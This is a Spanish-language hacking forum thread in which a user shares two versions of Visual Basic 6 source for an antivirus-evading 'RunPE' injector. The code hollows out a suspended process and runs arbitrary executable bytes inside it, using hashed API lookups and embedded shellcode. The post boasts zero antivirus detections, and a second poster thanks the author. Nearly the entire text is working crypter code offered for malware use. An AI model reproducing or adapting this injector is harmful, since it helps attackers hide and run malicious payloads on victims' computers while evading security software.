



1M3n3g@tt1 

M3n3g@tt1
Modders
Modders

http://www.pitbullsecurity.org \/ tudosobrehacker.com
Dom Mayo 13, 2012 12:55 pm
Buenas , los dejo a disfrutar ....

Código:
' ===========================================================================================================================
' ===========================================================================================================================
' => Autor: M3
' => RunPe + Invoke FUD baseado en el JunPE de Jhonjhon_123
' => Credits to Jhonjhon_123 | Karcrack | Cobein | Mike D Sutton
' => Detecciones : 0 | 37  (http://Servicio-externo.net/reporte.php?id=y4nu_SnKz)
' => Flecha : 13|05|2012
' => sHost : Ruta al exe
' => sBytes: Bytes a ejecutar
' ===========================================================================================================================
' ===========================================================================================================================
Declare Function CallThunk8 Lib "user32" Alias "CallWindowProcA" (ByRef cCode As Currency, Optional ByVal lP1 As Long, Optional ByVal lP2 As Long, Optional ByVal lP3 As Long, Optional ByVal lP4 As Long) As Long
Declare Function ExeThunk Lib "user32" Alias "CallWindowProcW" (ByVal Address As Any, Optional ByVal Param1 As Long, Optional ByVal Param2 As Long, Optional ByVal Param3 As Long, Optional ByVal Param4 As Long) As Long
Declare Function sMulDiv Lib "kernel32" Alias "MulDiv" (ByRef A As Any, Optional ByVal B As Long = 1, Optional ByVal c As Long = 1) As Long
Private ASM_GETAPIPTR(170)            As Byte
Private ASM_CALLCODE(255)              As Byte
Private sMEMORY(40)                    As Byte
Private sVALUE                        As Byte
Private IMAGE_DOS_HEADER(65)          As Byte
Private IMAGE_NT_HEADERS(256)          As Byte
Private IMAGE_SECTION_HEADER(60)      As Byte
Private PROCESS_INFORMATION(44)        As Byte
Private tCONTEXT(210)                  As Byte
Private STARTUPINFO(16)                As Long
Private sParams                        As Long
Private ImageBase                      As Long
Private hProcess                      As Long
Private hThread                        As Long
Private SizeOfImage                    As Long
Private SizeOfHeaders                  As Long
Private sEntryPoint                    As Long
Private VirtualAddress                As Long
Private sRawDataPoint                  As Long
Private sRawData                      As Long
Private Ebx                            As Long
Private D                              As Long
Private Z                              As Long
Private vItem                          As Variant
Private sSection                      As Integer


Public Function sInject(ByVal sHost As String, ByRef sBytes() As Byte)


For Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, _
&HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H10)

sMEMORY(Z) = vItem

Z = Z + 1

sVALUE = 200 + 48

Next


Call MoveMemory(sMulDiv(STARTUPINFO(0)), sMulDiv(72), CLng("0"))

Call MoveMemory(sMulDiv(tCONTEXT(0)), sMulDiv(&H10007), &H1 + &H3 + &H4)

Call MoveMemory(sMulDiv(IMAGE_DOS_HEADER(0)), sMulDiv(sBytes(0)), &H72)

Call MoveMemory(sMulDiv(sParams), sMulDiv(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)

Call MoveMemory(sMulDiv(IMAGE_NT_HEADERS(0)), sMulDiv(sBytes(sParams)), 256)

Call MoveMemory(sMulDiv(ImageBase), sMulDiv(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)

Call MoveMemory(sMulDiv(SizeOfImage), sMulDiv(IMAGE_NT_HEADERS(80)), &H1 + &H3 + &H4)

Call MoveMemory(sMulDiv(SizeOfHeaders), sMulDiv(IMAGE_NT_HEADERS(84)), &H1 + &H3 + &H4)

Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)

Call MoveMemory(sMulDiv(sSection), sMulDiv(IMAGE_NT_HEADERS(6)), &H2)

Call Invoke("KERNEL32", "CreateProcessW", 0, StrPtr(sHost), 0, 0, &H1, &H4, 0, 0, sMulDiv(STARTUPINFO(0)), sMulDiv(PROCESS_INFORMATION(0)))

Call MoveMemory(sMulDiv(hProcess), sMulDiv(PROCESS_INFORMATION(0)), &H1 + &H3)

Call MoveMemory(sMulDiv(hThread), sMulDiv(PROCESS_INFORMATION(4)), &H1 + &H3)

Call Invoke("NTDLL", "NtUnmapViewOfSection", hProcess, ImageBase)

Call Invoke("KERNEL32", "VirtualAllocEx", hProcess, ImageBase, SizeOfImage, &H3000&, &H40)

Call Invoke("NTDLL", "NtWriteVirtualMemory", hProcess, ImageBase, sMulDiv(sBytes(0)), SizeOfHeaders, CLng("0"))

For D = 0 To sSection - 1

Call MoveMemory(sMulDiv(IMAGE_SECTION_HEADER(0)), sMulDiv(sBytes(sParams + sVALUE + 40& * D)), &H64)

Call MoveMemory(sMulDiv(VirtualAddress), sMulDiv(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)

Call MoveMemory(sMulDiv(sRawData), sMulDiv(IMAGE_SECTION_HEADER(16)), &H1 + &H3 + &H4)

Call MoveMemory(sMulDiv(sRawDataPoint), sMulDiv(IMAGE_SECTION_HEADER(20)), &H1 + &H3)

Call Invoke("NTDLL", "NtWriteVirtualMemory", hProcess, ImageBase + VirtualAddress, sMulDiv(sBytes(sRawDataPoint)), sRawData, CLng("0"))

Next

Call Invoke("NTDLL", "NtGetContextThread", hThread, sMulDiv(tCONTEXT(CLng("0"))))
         
Call Invoke("NTDLL", "NtWriteVirtualMemory", hProcess, Ebx + &H4 + &H1 + &H3, sMulDiv(VirtualAddress), &H1 + &H3 + &H2, CLng("0"))

Call MoveMemory(sMulDiv(tCONTEXT(176)), sMulDiv(ImageBase + sEntryPoint), &H1 + &H3 + &H2)

Call MoveMemory(sMulDiv(sParams), sMulDiv(tCONTEXT(176)), &H5)

Call Invoke("NTDLL", "NtSetContextThread", hThread, sMulDiv(tCONTEXT(0)))

Call Invoke("NTDLL", "NtResumeThread", hThread, CLng("0"))

End Function

Public Sub MoveMemory(ByVal lpDest As Long, ByVal lpSource As Long, ByVal cBytes As Long)
 
    ExeThunk sMulDiv(sMEMORY(0)), lpDest, lpSource, cBytes, CLng("0")
 
End Sub

Function Invoke(ByVal sDLL As String, hHash As String, ParamArray vParams() As Variant) As Long

On Error Resume Next
Dim vItem                      As Variant
Dim sThunk                      As String

Call PutThunk(THUNK_GETAPIPTR, ASM_GETAPIPTR)

For Each vItem In vParams
sThunk = "68" & GetLng(vItem) & sThunk
Next vItem

Call PutThunk(sThunk & "B8" & GetLng(ExeThunk(VarPtr(ASM_GETAPIPTR(CLng("0"))), _
StrPtr(sDLL), gHash(hHash))) & "FFD0C3" & sThunk, ASM_CALLCODE)

Invoke = ExeThunk(VarPtr(ASM_CALLCODE(0)))


End Function

Private Function gHash(strHash) As Long
On Error Resume Next

Dim i          As Long
Dim lResult    As Long

For i = 1 To Len(strHash)
lResult = CallThunk8(-439163333029263.6533@, lResult)
lResult = lResult + Asc(Mid(strHash, i, 1))
Next i
gHash = "&H" & String(8 - Len(Hex(lResult)), "0") & Hex(lResult)


End Function

Private Function GetLng(ByVal lLng As Long) As String
On Error Resume Next
Dim lTMP                        As Long
lTMP = (((lLng And &HFF000000) \ &H1000000) And &HFF&) Or ((lLng And &HFF0000) \ &H100&) Or ((lLng And &HFF00&) * &H100&) Or ((lLng And &H7F&) * &H1000000) ' by Mike D Sutton
If (lLng And &H80&) Then lTMP = lTMP Or &H80000000
GetLng = String(8 - Len(Hex(lTMP)), "0") & Hex(lTMP)
End Function

Private Sub PutThunk(ByVal sThunk As String, ByRef bvRet() As Byte)
On Error Resume Next
Dim i                          As Long
For i = 0 To Len(sThunk) - 1 Step 2
bvRet((i / 2)) = ("&H" & Mid(sThunk, i + 1, 2))
Next i
End Sub

Function THUNK_GETAPIPTR() As String
THUNK_GETAPIPTR = "E82200000068A44E0EEC50E84300000083C408FF742404FFD0FF7424"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "0850E83000000083C408C3565531C0648B70308B760C8B761C8B6E08"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "8B7E208B3638471875F3803F6B7407803F4B7402EBE789E85D5EC355"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "52515356578B6C241C85ED74438B453C8B54057801EA8B4A188B5A20"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "01EBE330498B348B01EE31FF31C0FCAC84C07407C1CF0D01C7EBF43B"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "7C242075E18B5A2401EB668B0C4B8B5A1C01EB8B048B01E85F5E5B595A5DC3"
End Function







2N1TRO 

N1TRO
Usuario
Usuario

Dom Mayo 13, 2012 7:01 pm
te quedó genial
gracias por compartir

3M3n3g@tt1 

M3n3g@tt1
Modders
Modders

http://www.pitbullsecurity.org \/ tudosobrehacker.com
Mar Mayo 15, 2012 9:32 pm
Buenas, les dejo esta versión actualizada (gracias a LuchoPr por reportar que en XP se ejecutaba pero daba error enseguida).

SaludoS

:drinking:

Código:
' ===========================================================================================================================
' ===========================================================================================================================
' => Autor: M3
' => RunPe + Invoke FUD baseado en el JunPE de Jhonjhon_123
' => Credits to Jhonjhon_123 | Karcrack | Cobein | Mike D Sutton
' => Detecciones : 0 | 37  (http://Servicio-externo.net/reporte.php?id=y4nu_SnKz)
' => Flecha : 13|05|2012
' => sHost : Ruta al exe
' => sBytes: Bytes a ejecutar
' ===========================================================================================================================
' ===========================================================================================================================
Declare Function CallThunk8 Lib "user32" Alias "CallWindowProcA" (ByRef cCode As Currency, Optional ByVal lP1 As Long, Optional ByVal lP2 As Long, Optional ByVal lP3 As Long, Optional ByVal lP4 As Long) As Long
Declare Function ExeThunk Lib "user32" Alias "CallWindowProcA" (ByVal Address As Any, Optional ByVal Param1 As Long, Optional ByVal Param2 As Long, Optional ByVal Param3 As Long, Optional ByVal Param4 As Long) As Long
Declare Function sMulDiv Lib "kernel32" Alias "MulDiv" (ByRef a As Any, Optional ByVal b As Long = 1, Optional ByVal c As Long = 1) As Long
Private sVALUE                        As Byte
Private sMEMORY(40)                    As Byte
Private ASM_GETAPIPTR(170)            As Byte
Private ASM_CALLCODE(255)              As Byte
Private IMAGE_DOS_HEADER(65)          As Byte
Private IMAGE_NT_HEADERS(256)          As Byte
Private IMAGE_SECTION_HEADER(60)      As Byte
Private PROCESS_INFORMATION(44)        As Byte
Private tCONTEXT(210)                  As Byte
Private STARTUPINFO(16)                As Long
Private sParams                        As Long
Private sImageBase                    As Long
Private sProcess                      As Long
Private sThread                        As Long
Private SizeOfImage                    As Long
Private SizeOfHeaders                  As Long
Private sEntryPoint                    As Long
Private sVirtualAddress                As Long
Private sRawData                      As Long
Private sRawDataPoint                  As Long
Private sEbx                          As Long
Private D                              As Long
Private Y                              As Long
Private vItem                          As Variant
Private sSection                      As Integer


Public Function sInject(ByVal sHost As String, ByRef sBytes() As Byte)


For Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, _
&HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H10)


sMEMORY(Y) = vItem

Y = Y + 1

sVALUE = 200 + 48

Next


Call MoveMemory(sMulDiv(STARTUPINFO(0)), sMulDiv(72), CLng("0"))

Call MoveMemory(sMulDiv(tCONTEXT(CLng("0"))), sMulDiv(&H10007), &H1 + &H4 + &H3)

Call MoveMemory(sMulDiv(IMAGE_DOS_HEADER(CLng("0"))), sMulDiv(sBytes(CLng("0"))), 72)

Call MoveMemory(sMulDiv(sParams), sMulDiv(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)

Call MoveMemory(sMulDiv(IMAGE_NT_HEADERS(CLng("0"))), sMulDiv(sBytes(sParams)), 256)

Call MoveMemory(sMulDiv(sImageBase), sMulDiv(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)

Call MoveMemory(sMulDiv(SizeOfImage), sMulDiv(IMAGE_NT_HEADERS(80)), &H1 + &H4 + &H3)

Call MoveMemory(sMulDiv(SizeOfHeaders), sMulDiv(IMAGE_NT_HEADERS(84)), &H1 + &H4 + &H3)

Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)

Call MoveMemory(sMulDiv(sSection), sMulDiv(IMAGE_NT_HEADERS(6)), &H2)

Call Invoke("KERNEL32", "CreateProcessW", 0, StrPtr(sHost), 0, 0, &H1, &H4, 0, 0, sMulDiv(STARTUPINFO(CLng("0"))), sMulDiv(PROCESS_INFORMATION(CLng("0"))))

Call MoveMemory(sMulDiv(sProcess), sMulDiv(PROCESS_INFORMATION(CLng("0"))), &H1 + &H3)

Call MoveMemory(sMulDiv(sThread), sMulDiv(PROCESS_INFORMATION(4)), &H1 + &H3)

Call Invoke("NTDLL", "NtUnmapViewOfSection", sProcess, sImageBase)

Call Invoke("KERNEL32", "VirtualAllocEx", sProcess, sImageBase, SizeOfImage, &H3000&, &H40)

Call Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sImageBase, sMulDiv(sBytes(CLng("0"))), SizeOfHeaders, CLng("0"))

For D = 0 To sSection - 1

Call MoveMemory(sMulDiv(IMAGE_SECTION_HEADER(CLng("0"))), sMulDiv(sBytes(sParams + sVALUE + 40 * D)), &H40)

Call MoveMemory(sMulDiv(sVirtualAddress), sMulDiv(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)

Call MoveMemory(sMulDiv(sRawDataPoint), sMulDiv(IMAGE_SECTION_HEADER(16)), &H1 + &H4 + &H3)

Call MoveMemory(sMulDiv(sRawData), sMulDiv(IMAGE_SECTION_HEADER(20)), &H1 + &H3)

Call Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sImageBase + sVirtualAddress, sMulDiv(sBytes(sRawData)), sRawDataPoint, CLng("0"))

Next

Call Invoke("NTDLL", "NtGetContextThread", sThread, sMulDiv(tCONTEXT(CLng("0"))))

Call Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sEbx + &H4 + &H1 + &H3, sMulDiv(sVirtualAddress), &H1 + &H3 + &H2, CLng("0"))

Call MoveMemory(sMulDiv(tCONTEXT(176)), sMulDiv(sImageBase + sEntryPoint), &H1 + &H3)

Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(tCONTEXT(176)), &H1 + &H3)

Call Invoke("NTDLL", "NtSetContextThread", sThread, sMulDiv(tCONTEXT(CLng("0"))))

Call Invoke("NTDLL", "NtResumeThread", sThread, CLng("0"))

End Function


Public Sub MoveMemory(ByVal lpDest As Long, ByVal lpSource As Long, ByVal cBytes As Long)
 
    ExeThunk sMulDiv(sMEMORY(0)), lpDest, lpSource, cBytes, CLng("0")
 
End Sub



Function Invoke(ByVal sDLL As String, hHash As String, ParamArray vParams() As Variant) As Long

On Error Resume Next
Dim vItem                      As Variant
Dim sThunk                      As String

Call PutThunk(THUNK_GETAPIPTR, ASM_GETAPIPTR)

For Each vItem In vParams
sThunk = "68" & GetLng(vItem) & sThunk
Next vItem

Call PutThunk(sThunk & "B8" & GetLng(ExeThunk(VarPtr(ASM_GETAPIPTR(CLng("0"))), _
StrPtr(sDLL), gHash(hHash))) & "FFD0C3" & sThunk, ASM_CALLCODE)

Invoke = ExeThunk(VarPtr(ASM_CALLCODE(CLng("0"))))


End Function

Private Function gHash(strHash) As Long
On Error Resume Next

Dim i          As Long
Dim lResult    As Long

For i = 1 To Len(strHash)
lResult = CallThunk8(-439163333029263.6533@, lResult)
lResult = lResult + Asc(Mid(strHash, i, 1))
Next i
gHash = "&H" & String(8 - Len(Hex(lResult)), "0") & Hex(lResult)


End Function

Private Function GetLng(ByVal lLng As Long) As String
On Error Resume Next
Dim lTMP                        As Long
lTMP = (((lLng And &HFF000000) \ &H1000000) And &HFF&) Or ((lLng And &HFF0000) \ &H100&) Or ((lLng And &HFF00&) * &H100&) Or ((lLng And &H7F&) * &H1000000) ' by Mike D Sutton
If (lLng And &H80&) Then lTMP = lTMP Or &H80000000
GetLng = String(8 - Len(Hex(lTMP)), "0") & Hex(lTMP)
End Function

Private Sub PutThunk(ByVal sThunk As String, ByRef bvRet() As Byte)
On Error Resume Next
Dim i                          As Long
For i = 0 To Len(sThunk) - 1 Step 2
bvRet((i / 2)) = ("&H" & Mid(sThunk, i + 1, 2))
Next i
End Sub

Function THUNK_GETAPIPTR() As String
THUNK_GETAPIPTR = "E82200000068A44E0EEC50E84300000083C408FF742404FFD0FF7424"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "0850E83000000083C408C3565531C0648B70308B760C8B761C8B6E08"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "8B7E208B3638471875F3803F6B7407803F4B7402EBE789E85D5EC355"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "52515356578B6C241C85ED74438B453C8B54057801EA8B4A188B5A20"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "01EBE330498B348B01EE31FF31C0FCAC84C07407C1CF0D01C7EBF43B"
THUNK_GETAPIPTR = THUNK_GETAPIPTR & "7C242075E18B5A2401EB668B0C4B8B5A1C01EB8B048B01E85F5E5B595A5DC3"
End Function




